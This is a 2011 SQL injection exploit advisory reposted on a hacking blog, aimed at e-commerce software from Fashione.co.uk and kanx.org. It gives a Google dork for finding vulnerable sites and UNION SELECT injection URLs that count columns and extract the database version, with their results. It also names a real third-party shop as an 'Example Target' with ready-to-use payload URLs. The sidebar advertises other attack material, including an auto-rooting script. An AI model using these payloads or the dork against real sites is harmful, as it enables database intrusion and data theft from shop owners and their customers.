################################################################
[+] Exploit Title: E-Commerce Fashione.co.uk & www.kanx.org [SQL Injection]
[+] Google Dork: "Powered by: Fashione.co.uk" or "Ecommerce Design by www.kanx.org"
[+] Date: November 10, 2011
[+] Author: D4wFl1N
[+] Contact : D4wFl1N[at]deadc0de[dot]or[dot]id
[+] Web : http://D4wFl1N.blogspot.com
[+] Software Link: http://www.fashione.co.uk/ | http://www.kanx.org/
[+] Category: web apps [SQL Injection]
[+] Tested on: [Windows XP]
#################################################################
[+] Vulnerability :
*SQL injection Vulnerability*
http://localhost/path/index.php?page_id=dept&id=1'
http://localhost/path/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,[deadc0de],9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
http://localhost/path/index.php?page_id=brand&brandid=1
http://localhost/path/index.php?page_id=brand&brandid=1&id=1&deptid=1
[+] POC
http://localhost/path/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 8 10 \ Page 1
Selected Column Count is 30
Valid String Column is 8 and 10
http://localhost/path/index.php?page_id=dept&id=33&deptid=65+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 5.0.92-community 10 \ Page 1
http://localhost/path/index.php?page_id=dept&id=33&deptid=65+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 8 5.0.92-community \ Page 1
[+] Example Target
http://www.fusionfashion.co.uk/index.php
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1'
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1&deptid=1'
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
################################################################################
[+] Greets : r3d3_deadc0de, Gwe_meonkzt, p4rcomx, th3-w1tch, Dr.Cr4sh, Oghie, vim-n4n0, Avant Levithan a.k.a Bokepers :D and you
deadc0de-Team, Makassar Ethical Hacker, xCrew,nyubicrew Mildnet, irc.byroe.net
################################################################################
skip to main |
skip to sidebar
Pages
Followers
Blog Archive
-
▼
2011
(87)
-
▼
November
(16)
- How to learn with Damn Vulnerable Web Application
- Python Basics
- Esthost Taken Down – Biggest Cybercriminal Takedow...
- Added value, security for BOV Internet banking cus...
- Gmail + Google Chrome XSS Vulnerability
- Google Analytics XSS Vulnerability
- HackTool:Win32/Sqlinject
- Bug XSS on Gmail and Google Analytics
- E-Commerce Fashione.co.uk & www.kanx.org [SQL Inje...
- Damn Small XSS Scanner (DSXS)
- Hijacking Google Analytics
- Metasploit db_autopwn Windows 8
- Backdoor:Win32/Mangzamel.A
- pybot.py <= python bot v0.1
- Bug site www.polri.go.id
- Freegate and GProxy Tools
-
▼
November
(16)
Powered by Blogger.
Partner Site
Entri Populer
-
http://rapidshare.com/files/122553199/mikrotik-2.9.40.iso http://rapidshare.com/files/122287837/mikrotik_2.9.27_full.rar http://rapidshare.c...
-
#!/usr/bin/python import random def randomfunc(length, allthecrap): randomstuff = "" for number in range(1,length + 1)...
-
try { String sql="Select * from Users1"; String host ="jdbc:derby://localhost:1527/Nash"; ...
-
Samsung menggelar rangkaian acara Samsung Developer Competition 2013. Sebuah acara untuk menjembatani pemain di industri mobile, ahli di bi...
-
#!/usr/bin/perl # # Auto Rooting Script ver 1.0 # BHG Security Center ~ #bhg # _____ __ __________ __ # ...
Visitor
0 comments:
Post a Comment